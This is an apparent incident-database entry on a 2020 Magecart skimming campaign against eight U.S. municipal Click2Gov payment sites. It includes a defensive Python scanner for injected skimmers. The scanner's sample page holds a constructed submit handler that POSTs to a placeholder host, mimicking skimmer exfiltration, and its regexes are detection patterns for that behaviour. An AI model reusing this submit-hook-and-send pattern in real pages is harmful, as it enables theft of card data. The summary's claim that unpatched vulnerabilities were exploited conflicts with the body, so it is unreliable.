
Cyber Incident Victim: United States of America

Date: Apr 2020

Location: United States of America

Summary

A Magecart attack compromised eight U.S. municipal websites utilizing Click2Gov payment software, injecting malicious JavaScript to steal credit card details, expiration dates, CVV codes, names, and addresses during online transactions. The skimmer, lacking obfuscation, intercepted form submissions and exfiltrated data to two servers, with five affected cities having experienced prior breaches involving the same software. Researchers identified no technical links to earlier incidents but noted ongoing threats from Magecart targeting government entities, following previous breaches of academic, hospitality, and commercial sectors. The attack exploited unpatched vulnerabilities in the payment portal infrastructure, though vendor remediation status remained unclear.


Description

On or around April 10, 2020, threat actors compromised the websites of eight U.S. cities across three states by injecting Magecart credit card skimmers into municipal payment portals utilizing Click2Gov software. The attackers targeted self-service bill-paying systems operated by utilities and community development organizations, specifically focusing on online transactions such as parking ticket payments. Researchers from Trend Micro identified that malicious JavaScript code was inserted into the payment pages of affected city websites, activating when victims accessed these pages to submit payments. The skimmer operated by hooking into the payment form's 'submit' event, capturing entered data immediately upon form submission. Stolen information included credit card numbers, expiration dates, CVV codes, cardholder names, and contact addresses. The attackers exfiltrated this data via HTTP POST requests to two remote servers—one server received data from three compromised city sites, while the other handled data from the remaining five. Forensic analysis revealed the skimmers lacked advanced obfuscation or anti-debugging techniques, indicating a relatively unsophisticated implementation despite its effectiveness.
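The description above gives the two behaviours that characterised this skimmer: a handler hooked on the payment form's submit event, and an HTTP POST of the captured fields to a server outside the municipality's own infrastructure. A defender auditing a payment portal can look for exactly that combination in the page source. The following scanner is an added example written for this page, not Trend Micro's or CentralSquare's code: it parses a saved copy of a payment page, collects every script, and flags (a) scripts loaded from a host that is not on an allowlist and (b) inline scripts that both hook form submission and send data to a non-allowlisted host. The allowlisted host `payments.example-city.gov`, the placeholder hosts `collector.invalid` and `cdn.example.net`, and the sample page itself are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the portal is expected to load scripts from or talk to.
ALLOWED_HOSTS = {"payments.example-city.gov"}

# Indicators taken from the incident write-up: a submit hook plus an outbound send.
SUBMIT_HOOK = re.compile(r"addEventListener\s*\(\s*['\"]submit['\"]|\.onsubmit\s*=")
NETWORK_SEND = re.compile(r"XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|\bPOST\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class _ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def external_hosts(text, allowed):
    """Return every absolute-URL host referenced in text that is not allowlisted."""
    hosts = set()
    for m in URL_RE.finditer(text):
        host = urlparse(m.group(0)).hostname
        if host and host not in allowed:
            hosts.add(host)
    return hosts


def scan_page(html, allowed):
    """Flag scripts that match the skimmer pattern described in the incident."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, (src, body) in enumerate(parser.scripts):
        if src:
            # Relative src (no hostname) is first-party; absolute src must be allowlisted.
            host = urlparse(src).hostname
            if host and host not in allowed:
                findings.append({"script": idx, "reason": "external script source", "hosts": [host]})
            continue
        hooks_submit = bool(SUBMIT_HOOK.search(body))
        sends = bool(NETWORK_SEND.search(body))
        hosts = external_hosts(body, allowed)
        # Require all three so ordinary client-side validation is not reported.
        if hooks_submit and sends and hosts:
            findings.append({"script": idx, "reason": "submit hook with send to non-allowlisted host",
                             "hosts": sorted(hosts)})
    return findings


# Constructed sample page: one allowlisted script, one relative script, one benign
# validation handler, one external script, and one inline script carrying the indicators.
SAMPLE_PAGE = """<html><body>
<form id="pay" action="/pay" method="post"><input id="card"></form>
<script src="https://cdn.example.net/analytics.js"></script>
<script src="/js/app.js"></script>
<script src="https://payments.example-city.gov/js/checkout.js"></script>
<script>
  // benign: hooks submit for validation, sends nothing anywhere
  document.getElementById('pay').addEventListener('submit', function (e) {
    if (!document.getElementById('card').value) { e.preventDefault(); }
  });
</script>
<script>
  // constructed marker only: submit hook plus a POST to a host outside the allowlist
  document.getElementById('pay').addEventListener('submit', function () {
    fetch('https://collector.invalid/c', { method: 'POST', body: '' });
  });
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(f)
```

The check is deliberately a conjunction: a submit handler alone is normal for any form with client-side validation, and an external host alone may be a legitimate CDN, so only the combination (or a script sourced from an unexpected origin) is reported. The same allowlist is the natural input for a Content-Security-Policy `script-src` and `connect-src` directive on the portal, which would have blocked both the injected script's network send and any off-origin script load rather than merely detecting them after the fact.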


The incident impacted municipalities that had previously experienced Click2Gov-related breaches in 2018 and 2019, with five of the eight affected cities having been compromised in prior attacks. Trend Micro confirmed the skimming activity remained active as of June 2020 but did not disclose whether any cities had removed the malicious code. Researchers identified no technical connections between this campaign and earlier breaches, though all incidents involved exploitation of Click2Gov payment systems. Previous breaches were attributed to municipalities failing to patch a known 2017 vulnerability in Click2Gov, but the 2020 attack vector was not explicitly linked to unpatched software. CentralSquare Technologies, formed through Superion's 2018 merger and responsible for Click2Gov, did not publicly respond to inquiries about the incident. The attackers exclusively targeted Click2Gov payment forms, distinguishing this campaign from broader Magecart operations that typically skim diverse website payment systems. Trend Micro notified affected cities but withheld their identities, citing a policy against naming victims to prioritize remediation. Analysis of server infrastructure found no overlap with infrastructure from prior breaches, though the reuse of previously compromised cities suggested ongoing targeting of vulnerable municipal payment portals.
